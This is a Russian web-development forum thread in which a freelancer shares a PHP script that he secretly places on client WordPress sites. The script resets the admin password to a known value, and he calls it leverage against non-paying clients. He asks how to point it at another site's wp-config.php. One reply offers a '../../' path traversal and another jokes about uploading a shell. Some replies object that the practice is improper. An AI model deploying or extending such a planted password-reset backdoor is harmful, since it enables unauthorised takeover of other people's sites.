Форум Сайтостроение Веб-строительство

Функция require_once

Wordpreser
На сайте с 01.08.2013
Offline
47
Wordpreser
1198

Доброй ночи.

Есть скрипт который ставлю в корень сайта на WP и после его запуска то пароль админки сбрасывается. Это моя защита от недобросовестных заказчиков.

Вот сам скрипт.

<?php
    require_once('wp-config.php'); 
    $new_password = md5('password');
    $username     = 'admin'; 
    $wpdb->query("UPDATE `{$wpdb->prefix}users` SET `user_pass` = '{$new_password}' WHERE `user_login` = '{$username}'");
?>

Вопрос, он стоит на сайта мойсайт1.ру, а на другом сайте этого же хостера его нет. Вопрос, как изменить функцию require_once чтобы получить файл wp-config.php c другого сайта если адрес второго сайта известен и пути у хостера такие /www/МойДомен1/wp-config.php

LEOnidUKG
На сайте с 25.11.2006
Online
1723
LEOnidUKG
#1

А вы с этого форума не хотите получить файл config.php ну или с другого любого блога? Подумайте. Тщательно подумайте.

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/
Александр Смирнов
На сайте с 30.08.2007
Offline
102
Александр Смирнов
#2
Wordpreser:
Доброй ночи.
Есть скрипт который ставлю в корень сайта на WP и после его запуска то пароль админки сбрасывается. Это моя защита от недобросовестных заказчиков.
Вот сам скрипт.
<?php
    require_once('wp-config.php'); 
    $new_password = md5('password');
    $username     = 'admin'; 
    $wpdb->query("UPDATE `{$wpdb->prefix}users` SET `user_pass` = '{$new_password}' WHERE `user_login` = '{$username}'");
?>

Вопрос, он стоит на сайта мойсайт1.ру, а на другом сайте этого же хостера его нет. Вопрос, как изменить функцию require_once чтобы получить файл wp-config.php c другого сайта если адрес второго сайта известен и пути у хостера такие /www/МойДомен1/wp-config.php

Как правило, хостеры заботятся о том, чтобы как раз другие пользователи не получили доступ к чужим файлам. Поэтому, никак. А если такое получается, то это причина искать нового хостера.

Разработаю веб-сервисы на Yii2 фреймворке от 150 тыс. руб. в мес. Обучу программированию на Yii2
K5
На сайте с 21.07.2010
Offline
209
kgtu5
#3

может уж сразу "ключи от квартиры где деньги лежат" (с) ??????

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
Wordpreser
На сайте с 01.08.2013
Offline
47
Wordpreser
#4
А вы с этого форума не хотите получить файл config.php ну или с другого любого блога? Подумайте. Тщательно подумайте.

Вы меня явно не поняли. Причем тут форум? :-\

Я фрилансер, работал с человеком довольно долго, сделал ему порядка 6 сайтов. Последнюю часть оплаты не сделал и смылся. Скрипт стоит на одном из его сайтов, но мне нужно чтобы он брал конфиги с того сайта за который он не оплатил, вот поэтому и спрашиваю как просто подняться на 2 каталога вверх а потом на 2 вперед :) Надеюсь поймете.

Идеи проектов Резкий всплеск прямых заходов. Вопрос по js, как
dayw
На сайте с 25.01.2006
Offline
116
dayw
#5

require_once('../../wp-config.php');

Если аккаунт позволяет иметь доступ к другим сайтам, то можно в эту сторону копать

../../
Интернет-магазин игровых приставок в Москве (https://savelagame.ru)
Wordpreser
На сайте с 01.08.2013
Offline
47
Wordpreser
#6

Вы меня не поняли, у меня был доступ к его хостингу, и мой скрипт есть на одном из его сайтов. И ничего лишнего я не собираюсь делать. Может добьюсь оплаты :)

sergv
На сайте с 13.04.2006
Offline
413
sergv
#7
dayw:
Если аккаунт позволяет иметь доступ к другим сайтам

Тогда уже можно и полный путь писать /www/ЧужойДомен1/wp-config.php

Но это дырка, а не хостинг получается... Даже не знаю каким криворуким надо быть, чтобы так настроить сервер.

---------- Добавлено 04.04.2014 в 10:50 ----------

Wordpreser, если доступ есть - зайди и запусти. Если доступа нет - ничего ты не сделаешь. Файлы лежат в чужом аккаунте, под чужим именем с чужой группой. Взять и заюзать их нельзя.

Попробуй работать по схеме - выкладывать работы на своих площадках, демонстрируй, принимай оплату и тогда переноси на хост к клиенту.

Просто "подкладывать" левые скрипты к клиентским проектам не очень красивое и правильное занятие. Порядочный клиент пароли сменил, работу оплатил, а скрипты остались.

https://REGHOME.ru - регистрация и продление доменов от 169₽ в российских и международных зонах по честным ценам без звездочек. (R01, WebNames, UK2). Принимаем Ю-Money, Visa, MasterCard, Мир
Wordpreser
На сайте с 01.08.2013
Offline
47
Wordpreser
#8

Скрипт после оплаты удаляю.

Файлы лежат в чужом аккаунте, под чужим именем с чужой группой. Взять и заюзать их нельзя.

Я имел в виду переход по его аккаунту, на одном то сайте есть скрипт и через админку я могу его заменить чтобы он брал с другого сайта этого же пользователя.

Вопрос по объектному кешированию Как снять ограничение на Нарушения и угрозы безопасности
LEOnidUKG
На сайте с 25.11.2006
Online
1723
LEOnidUKG
#9

Да заливайте сразу шел и всё. Ч0 уж париться то.

Joker-jar
На сайте с 26.08.2010
Offline
154
Joker-jar
#10

> Я фрилансер

> сделал ему порядка 6 сайтов

@

> Вопрос, как изменить функцию require_once чтобы бла-бла

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий